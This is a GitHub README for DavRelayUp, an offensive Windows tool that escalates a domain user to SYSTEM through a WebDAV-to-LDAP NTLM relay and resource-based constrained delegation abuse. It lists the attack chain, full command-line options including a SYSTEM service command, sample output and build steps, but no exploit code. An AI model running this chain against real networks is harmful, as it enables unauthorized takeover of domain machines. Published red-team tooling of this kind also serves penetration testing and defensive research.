/DavRelayUp

DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced (the default settings).

Primary LanguageC#

DavRelayUp

A quick and dirty port of KrbRelayUp with modifications to allow for NTLM relay from webdav to LDAP in order to streamline the abuse of the following attack primitive:

  1. (Optional) New machine account creation (New-MachineAccount)
  2. Force start the WebClient service
  3. Start webdav relay server (GoRelayServer - a golang DLL that is embeded in DavRelayUp using Costura.Fody)
  4. Local machine account auth coercion (SharpSystemTriggers)
  5. NTLM relay to LDAP
  6. Add RBCD privs and obtain privileged ST to local machine (Rubeus)
  7. Using said ST to authenticate to local Service Manager and create a new service as NT/SYSTEM. (SCMUACBypass)

This is essentially a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced (the default settings).

Usage

DavRelayUp - Relaying you to SYSTEM, again...

Usage: DavRelayUp.exe [-c] [-cn COMPUTERNAME] [-cp PASSWORD | -ch NTHASH]

RBCD Options:
    -c   (--CreateNewComputerAccount) Create new computer account for RBCD. Will use the current authenticated user.
    -cn  (--ComputerName)             Name of attacker owned computer account for RBCD. (default=DAVRELAYUP$)
    -cp  (--ComputerPassword)         Password of computer account for RBCD. (default=RANDOM [if -c is enabled])
    -ch  (--ComputerPasswordHash)     Password NT hash of computer account for RBCD. (either -cp or -ch must be specified)
    -i   (--Impersonate)              User to impersonate. Should be a local administrator in the target computer. (default=Administrator)

KrbSCM Options:
    -s   (--ServiceName)              Name of the service to be created. (default=KrbSCM)
    -sc  (--ServiceCommand)           Service command [binPath]. (default = spawn cmd.exe as SYSTEM)

General Options:
    -p  (--Port)                     Port for WebDAV Server (default=55555)
    -d  (--Domain)                   FQDN of domain. (Optional)
    -dc (--DomainController)         FQDN of domain controller. (Optional)
    -ssl                             Use LDAP over SSL. (Optional)
    -n                               Use CreateNetOnly (needs to be on disk) instead of PTT when importing ST (Optional)
    -v  (--Verbose)                  Show verbose output. (Optional)
    -h  (--Help)                     Show help

Known Issues

If DavRelayUp gets stuck at one of these stages - try using a different port by specifying [-p] flag

DavRelayUp - Relaying you to SYSTEM, again...

[+] WebClient Service started successfully
[+] Starting Relay Server on Port 55555
[+] Coercing System Authentication
DavRelayUp - Relaying you to SYSTEM, again...

[+] WebClient Service started successfully
[+] Starting Relay Server on Port 55555
[+] Coercing System Authentication
[+] WebDAV Request: No Authorization header
[+] WebDAV Response: Sending 401 Unauthorized with "WWW-Authenticate: NTLM" header

Examples

DavRelayUp.Demo.mp4

example

Building

  1. Build GoRelayServer (already built and ready in this repository but in case you want to do it yourself)
    PS C:\Tools\DavRelayUp> cd GoRelayServer
    PS C:\Tools\DavRelayUp\GoRelayServer> go build --buildmode=c-shared -ldflags="-s -w"  -o "../DavRelayUp/Costura64/GoRelayServer.dll" main.go
    
    This will build the GoRelayServer DLL and save it in "DavRelayUp\DavRelayUp\Costura64\GoRelayServer.dll" -> This is the folder from which Costura.Fody will embed it in the final DavRelayUp.exe executable.
  2. Open KrbRelayUp.sln in Visual Studio 2019
  3. Make sure that Solution Configuration is set to Release and hit build (CTRL+SHIFT+B)

TODO

  • Add ShadowCred attack as a RELAY method
  • Add U2U support to allow for the attack without the need for a machine account

Mitigation & Detection

Acknowledgements